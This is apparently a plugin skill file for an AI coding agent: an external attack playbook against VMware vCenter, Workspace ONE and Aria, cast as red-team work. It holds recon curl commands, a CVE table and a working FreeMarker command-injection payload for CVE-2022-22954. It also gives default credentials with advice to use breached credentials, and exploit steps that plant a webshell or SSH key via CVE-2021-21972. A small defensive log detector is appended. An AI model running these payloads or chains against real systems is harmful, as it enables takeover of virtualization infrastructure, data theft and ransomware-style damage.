From claude-bughunter
External attack matrix for VMware vCenter/vSphere/Workspace ONE/Aria: version fingerprinting, high-impact CVE chain, default creds, SSO disclosure, LDAP enumeration. Use when recon shows vCenter on port 443.
Install: `npx claudepluginhub elementalsouls/claude-bughunter`

Slash command: `/claude-bughunter:vmware-vcenter-attack`
Trigger when external recon shows ANY of:
- /ui, /ui/login, /websso/SAML2/Metadata, /sdk, /mob (Managed Object Browser)
- vcenter / vsphere / vcsa / psc / vmware
- /SAAS, /SAAS/auth, /SAAS/login, /SAAS/horizon
- /vco, /vco-controlcenter, /orchestrator
- /lcm/api/v1/portal, /admin

Do NOT use for:
```bash
TARGET="vcenter.target.com"
# Build info endpoint (often public; reveals the exact patch level)
curl -sk "https://$TARGET/sdk/vimServiceVersions.xml"
# UI build (visible in page source)
curl -sk "https://$TARGET/ui/login" | grep -oE 'build[^"]{0,40}'
curl -sk "https://$TARGET/ui/" | grep -oE 'vsphere[^"]{0,40}'
# REST API version (vSphere 7+)
curl -sk "https://$TARGET/api/appliance/system/version"
# Certificate metadata (SANs often name the real host / other nodes)
echo | openssl s_client -connect "$TARGET:443" -servername "$TARGET" 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alt"
# SSO Admin Service (info disclosure)
curl -sk "https://$TARGET/sso-adminserver/sdk/vsphere.local"
curl -sk "https://$TARGET/websso/SAML2/Metadata/vsphere.local"
```
Map build → version → CVE applicability using the VMware security advisories (vmware.com/security/advisories).
| CVE | Affected | Vector | Status |
|---|---|---|---|
| CVE-2024-37085 | ESXi 7.0/8.0 < specific patch | AD group "ESX Admins" auto-admin bypass | High — Domain takeover→ESXi RCE, exploited in ransomware ops |
| CVE-2024-22273 | ESXi/Workstation/Fusion/vCenter storage controller | OOB read/write — requires VM-local access (NOT a pre-auth network SSRF; see Section 9) | Important (CVSS 8.1), not external pre-auth |
| CVE-2024-22252/53 | Workstation/Fusion (not vCenter) | Sandbox escape | Not external |
| CVE-2023-34048 | vCenter 7/8 < specific build | DCE/RPC pre-auth heap OOB write → RCE | Critical, patched 2023-10 |
| CVE-2023-20887 | Aria Operations for Networks | Pre-auth command injection → RCE | Critical |
| CVE-2023-20892 | vCenter 7/8 | Use-after-free in DCE/RPC | High |
| CVE-2022-31656/31659 | Workspace ONE Access 21.x | Pre-auth SSRF + auth bypass | Critical chained |
| CVE-2022-22954 | Workspace ONE Access | Pre-auth server-side template injection (SSTI) → RCE | Critical, widely exploited |
| CVE-2021-22005 | vCenter 6.7/7.0 < build | Analytics service pre-auth file upload → RCE | Critical |
| CVE-2021-21985 | vCenter 6.5/6.7/7.0 < build | vSAN Health Check plugin pre-auth RCE | Critical |
| CVE-2021-21972 | vCenter 6.5/6.7/7.0 < build | vRealize plugin /ui/vropspluginui/rest/services/uploadova pre-auth file upload → RCE | Critical, exploited heavily |
| CVE-2020-3992 | ESXi OpenSLP | Pre-auth use-after-free → RCE | Critical, ESXi ransomware vector |
| CVE-2019-5544 | ESXi OpenSLP | Pre-auth heap overflow | Critical |
```bash
# Detection only — DO NOT execute the file upload without explicit scope OK
curl -sk -o /dev/null -w "%{http_code}\n" \
  "https://$TARGET/ui/vropspluginui/rest/services/uploadova"
# 405 → endpoint exists, version vulnerable
# 404 → patched (endpoint removed)
# 401 → patched (auth required)
curl -sk -o /dev/null -w "%{http_code}\n" \
  "https://$TARGET/ui/vropspluginui/rest/services/getstatus"
```
Public PoC by Mikhail Klyuchnikov exists; do not execute against client infra without explicit RCE-attempt sign-off.
```bash
# Stage A — detection only: reachability + baseline. No command execution yet.
curl -sk -o /tmp/wone_baseline.txt -w "%{http_code}\n" \
  "https://$TARGET/catalog-portal/ui/oauth/verify?error=&deviceUdid=probe"
# 4xx with FreeMarker/catalog-portal error template → endpoint present, candidate vulnerable.
# 404 → patched/removed. Keep the baseline body to diff against Stage B.

# Stage B — execution (ONLY with explicit RCE-attempt sign-off): emit a unique canary
# so a coincidental WAF/error page containing "uid=" cannot be mistaken for real output.
CANARY="VCTR$(head -c8 /dev/urandom | od -An -tx1 | tr -d ' \n')"
curl -sk "https://$TARGET/catalog-portal/ui/oauth/verify?error=&deviceUdid=\${\"freemarker.template.utility.Execution\"?new()(\"echo ${CANARY}; id\")}"
# Confirmed RCE ONLY if the response contains the exact $CANARY echoed back AND "uid=" output
# that is absent from /tmp/wone_baseline.txt (in-band command output, body-diff against baseline).
```
Confirmed RCE requires the unique $CANARY reflected in-band plus uid= output not present in the Stage-A baseline → critical. Stop and report. A bare uid= with no canary echo is NOT confirmation.
| Product | Default user | Default password |
|---|---|---|
| vCenter 6.x | administrator@vsphere.local | <set-during-install> |
| vCenter Appliance root | root | vmware (legacy) or <set> |
| ESXi root | root | <blank> or vmware |
| vCenter Server Appliance Mgmt (5480) | root | <set-during-install> |
| Aria Operations | admin | vmware (legacy) |
| Workspace ONE | admin | <set> |
⚠ Do not spray vCenter — administrator@vsphere.local has VERY low lockout threshold (often 3 attempts → 60s lockout, configurable to permanent). One attempt with high-confidence guess only. Use creds discovered in breach corpora.
```bash
# SSO Admin endpoint (frequently exposes domain info)
curl -sk "https://$TARGET/websso/SAML2/Metadata/vsphere.local" | xmllint --format -
# Extract Identity Source info
curl -sk "https://$TARGET/sso-adminserver/sdk/vsphere.local"
# Try anonymous LDAP bind to vmdir (port 389/636 if exposed)
ldapsearch -x -H "ldap://$TARGET:389" -b "" -s base
ldapsearch -x -H "ldap://$TARGET:389" -b "cn=Configuration,cn=vmware,cn=cis,dc=vsphere,dc=local"
```
```bash
curl -skI "https://$TARGET/mob"
# 401 → auth required (good for the defender)
# 200 → MOB exposed → can browse VMs, hosts, datastores, sessions without credentials in some misconfigs
# Auth'd MOB lets you walk the entire vSphere tree:
curl -sk -u 'administrator@vsphere.local:<pw>' "https://$TARGET/mob/?moid=ServiceInstance&doPath=content"
```

```bash
# Get session token
curl -sk -X POST -u 'user@vsphere.local:<pw>' "https://$TARGET/api/session"
# Returns: "<session-token>"
# List VMs
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/api/vcenter/vm"
# List hosts
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/api/vcenter/host"
# List datastores
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/api/vcenter/datastore"
# Datastore file download (HUGE — VMDK files, snapshots, credentials in cloud-init)
# /folder/<path>?dsName=<ds>&dcPath=<dc>
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/folder?dsName=datastore1&dcPath=Datacenter"
```
```bash
# Metadata
curl -sk "https://$TARGET/SAAS/auth/saml/response"
curl -sk "https://$TARGET/SAAS/auth/wsfed/services/idp"
curl -sk "https://$TARGET/SAAS/jersey/manager/api/health"
curl -sk "https://$TARGET/catalog-portal/services/airwatch/identifiers"
# Login page
curl -sk "https://$TARGET/SAAS/login/0"
```

```bash
# vRealize Operations Manager
curl -sk "https://$TARGET/suite-api/api/versions"
curl -sk "https://$TARGET/casa/nodes/thumbprints"
# Aria Automation
curl -sk "https://$TARGET/csp/gateway/am/api/about"
curl -sk "https://$TARGET/cluster-administration/api/health"
# vRealize Orchestrator
curl -sk "https://$TARGET/vco/api/about"
curl -sk "https://$TARGET/vco-controlcenter/api/health"
```
- vCenter-Exploit collection (multiple PoCs on GitHub for 21972, 21985, 22005)
- Greenbone/openvas-scanner VMware NASL plugins — version detection
- nuclei templates: vmware-vcenter-*.yaml, cve-2021-21972.yaml, cve-2022-22954.yaml
- Metasploit modules: exploit/multi/http/vmware_vcenter_*

- /ui/vropspluginui/* — IDS signature
- /sdk from non-management IP
- administrator@vsphere.local auth failures

Pair with mid-engagement-ir-detection skill — vCenter is monitored heavily in mature SOCs.
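The defender-side counterpart to the detection pointers above, as an added example that is not part of the original skill: it runs the IDS-style checks the list names (the vropspluginui upload handler, the FreeMarker injection point, /sdk or /mob from outside management ranges, repeated SSO/API login failures) over a few constructed access-log lines. The combined-log-style format and the 10.10.0.0/16 management range are assumptions; adapt the regex to the real proxy or vCenter access log.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Networks allowed to reach /sdk and /mob (assumed value; replace with your management ranges).
MGMT_NETS = [ip_network("10.10.0.0/16")]
# Path signatures the matrix calls out: the CVE-2021-21972 plugin upload handler and the
# CVE-2022-22954 FreeMarker injection point. Paths are URL-decoded before matching.
RULES = [
    ("vropspluginui upload handler hit (CVE-2021-21972)",
     re.compile(r"^/ui/vropspluginui/rest/services/(uploadova|getstatus)")),
    ("FreeMarker SSTI attempt on oauth/verify (CVE-2022-22954)",
     re.compile(r"^/catalog-portal/ui/oauth/verify\?.*freemarker", re.I)),
]
# Constructed combined-log-style line: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    # Per-request rules: returns (alert, source_ip) for a suspicious line, else None.
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, path = m["ip"], unquote(m["path"])
    for name, rx in RULES:
        if rx.search(path):
            return name, ip
    if path.startswith(("/sdk", "/mob")) and not any(ip_address(ip) in n for n in MGMT_NETS):
        return "SDK/MOB reached from non-management IP", ip
    return None

def detect(lines, fail_threshold=3):
    # Per-request rules first, then IPs whose SSO/API login failures reach the threshold
    # (3 mirrors the low lockout threshold the text warns about).
    alerts = [hit for hit in map(classify, lines) if hit]
    fails = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["status"] == "401" and m["path"].startswith(("/websso/", "/api/session")):
            fails[m["ip"]] += 1
    alerts += [(f"{n} SSO/API login failures (credential guessing)", ip)
               for ip, n in fails.items() if n >= fail_threshold]
    return alerts

SAMPLE = [  # constructed sample lines, not real vCenter output
    '203.0.113.7 - - [10/Mar/2026:10:00:01 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 405 0',
    '203.0.113.7 - - [10/Mar/2026:10:00:02 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%7D HTTP/1.1" 400 512',
    '198.51.100.9 - - [10/Mar/2026:10:00:03 +0000] "GET /sdk/vimServiceVersions.xml HTTP/1.1" 200 2041',
    '10.10.3.4 - - [10/Mar/2026:10:00:04 +0000] "GET /sdk/vimServiceVersions.xml HTTP/1.1" 200 2041',
] + ['203.0.113.7 - - [10/Mar/2026:10:00:05 +0000] "POST /api/session HTTP/1.1" 401 0'] * 3
```

`detect(SAMPLE)` yields four alerts: the two CVE probes and the three failed logins from 203.0.113.7, plus the /sdk hit from 198.51.100.9; the management-range /sdk request stays silent.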
If recon reveals vCenter only via VPN (not direct internet) → STOP. That is internal infrastructure and outside the external-only AI scope per feedback_skill_boundaries. The user handles internal vCenter work directly.
Internet-exposed vCenter is unfortunately common on the perimeter — and frequently outdated by years. The 2021-21972 / 21985 / 22954 trifecta still pays in 2026 because patching cycles for hypervisor management are slow and vendor-managed.
| Finding | Severity |
|---|---|
| vCenter on internet, current patch | Informational (attack surface note) |
| vCenter on internet, missing patches with public RCE | Critical (entire virtualization plane compromise) |
| vCenter on internet + default admin password | Critical (immediate full takeover) |
| Workspace ONE on internet, unpatched 22954 | Critical |
| MOB anonymously accessible | High (full topology disclosure) |
| /sdk reachable + version disclosure only | Medium (info disclosure + attack-surface concentration) |
- enterprise-vpn-attack — vCenter is frequently the post-VPN target; if VPN is breached, vCenter is the natural next pivot (but internal — defer to user)
- m365-entra-attack — vCenter SSO sometimes federated to Entra; cred-chain bridging
- mid-engagement-ir-detection — vCenter monitoring is sensitive; expect mid-engagement mitigations
- redteam-report-template — vCenter findings need clear blast-radius framing (this is the virtualization plane, not just an app)

- hunt-saml — vCenter Workspace ONE / VMware Identity Manager publishes SAML SP metadata at /SAAS/API/1.0/GET/metadata/idp.xml and consumes assertions at predictable ACS URLs. Chain primitive: vCenter SAML SP metadata reachable → IdP fingerprinted → hunt-saml XSW1-XSW8 against the federating IdP → forged assertion with userPrincipalName=administrator@vsphere.local → SP-impersonation as vCenter admin → full virtualization-plane takeover.
- hunt-rce — VMware's high-impact CVE catalog (CVE-2021-21972, CVE-2021-21985, CVE-2022-22954, CVE-2023-20887) is almost entirely pre-auth RCE. Chain primitive: vCenter version fingerprint via SSL banner or /ui/login body → confirm patch level missing → hunt-rce deserialization/SSTI gadget from the matching CVE PoC → root on vCenter appliance → API-token mint → cluster-wide VM control.
- enterprise-vpn-attack — VPN compromise + vCenter on internal-only is a natural post-VPN pivot, but external-only engagement scope sometimes forbids it. Chain primitive: VPN appliance CVE → foothold inside corp network → if scope permits, vmware-vcenter-attack becomes reachable on internal-only vCenter → datacenter takeover.
- m365-entra-attack — Some VMware deployments federate vCenter SSO to Entra. Chain primitive: vCenter SSO discovery → AuthURL points to login.microsoftonline.com → m365-entra-attack Entra ATO on administrator@vsphere.local synced identity → SAML assertion → vCenter admin without ever brute-forcing vCenter SSO.
- mid-engagement-ir-detection — VMware vSAN/vCenter alerting is sensitive; expect SOC to patch or block within hours of detection. Chain primitive: confirmed vCenter CVE → run mid-engagement-ir-detection baseline capture BEFORE attempting exploitation → if response patterns change mid-test, capture the SOC-patched state as a SECOND finding (defensive-action observed). Package both via redteam-report-template.

These are the load-bearing public references for every CVE called out in the matrix above. Every entry includes the vendor advisory, the originating researcher writeup or KEV-catalog entry, and (where public) in-the-wild exploitation references.

vropspluginui unauthenticated arbitrary file upload (canonical pre-auth RCE)
/ui/vropspluginui/rest/services/uploadova with a tar/OVA containing a path-traversal entry. On Windows write webshell.jsp under the vsphere-ui webroot for SYSTEM; on Linux drop authorized_keys under /home/vsphere-ui/.ssh/ and SSH in.
uploadova handler did not sanitize archive entry paths.

ProxygenController in the vSAN Health plugin → Java unsafe reflection chained with an SSRF primitive → arbitrary method invocation as vsphere-ui → command execution.

/analytics/telemetry/ph/api/hyper/send writes attacker-controlled file outside the intended directory; chained with subsequent service abuse to reach RCE as the vCenter service account.

/catalog-portal/ui/oauth/verify?deviceUdid=${...} injects a FreeMarker template; freemarker.template.utility.Execute runs OS commands as the horizon service account. Single-request RCE.

Host header during local-domain login flow; the server routes its internal validation request to the attacker-controlled hostname → returns admin session without legitimate credentials.

bash -c invocation. Single unauth POST → root.

vmdird crashes shortly before backdoor deployment.

ESX Admins and adds an account. ESXi auto-grants every member full admin rights without checking that the group existed at join time. End-to-end: AD foothold → group create → SSH/API root on every domain-joined ESXi host → mass VM encryption.
ESX Admins with no domain-scoped identity validation.

mid-engagement-ir-detection skill when working a target where vCenter is reachable.

The pattern across every entry above: VMware management-plane CVEs are pre-auth, network-reachable, and mass-exploited within days of patch. When external recon surfaces any of these products at a current-minus-one patch level, that is a Critical finding worth a same-day callout in the deliverable — not a Medium info-disclosure.